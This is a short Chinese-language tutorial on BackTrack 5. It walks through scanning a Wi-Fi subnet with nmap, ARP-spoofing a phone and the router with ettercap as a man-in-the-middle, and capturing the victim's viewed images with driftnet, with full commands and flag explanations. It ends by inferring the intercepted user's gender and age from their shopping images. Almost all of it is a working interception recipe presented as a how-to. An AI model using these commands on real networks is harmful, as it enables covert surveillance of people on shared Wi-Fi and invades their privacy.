1、保证手机与BT5系统连接同一个Wi-Fi,假设这里的网段为192.168.1.*,手机的IP地址为:192.168.1.125。打开BT5,终端输入命令:nmap -sP 192.168.1.*。
2、选定一个开启的主机作为目标机,输入命令:ettercap -i wlan0 -Tq -M arp:remote /192.168.1.125/ /192.168.1.1/
命令参数解释:
-i : 指定监听网口
-T :使用文本模式启动
-M:使用中间人攻击
-q:安静模式
3、保存前一个终端,重新打开一个终端,输入命令:driftnet -i wlan0 -d /root/picture,该命令实时显示目标机的图片,此时的图片并未保存。
4、若需要将图片保存到指定文件夹,终端输入命令:driftnet -i wlan0 -a -d /root/picture
driftnet部分参数解释:
-b 捕获到新的图片时发出嘟嘟声
-i interface 选择监听接口
-f file 读取一个指定pcap数据包中的图片
-p 不让所监听的接口使用混杂模式
-a 后台模式:将捕获的图片保存到目录中(不会显示在屏幕上)
-m number 指定保存图片数的数目
-d directory 指定保存图片的路径
-x prefix 指定保存图片的前缀名
5、 打开文件夹:/root/picture,就可以看到被截获的用户所产生的实时图片。通过这些图片可以看出,手机用户正在访问淘宝网站。通过淘宝图片可以初步推断该用户可能是女性,二十多岁。
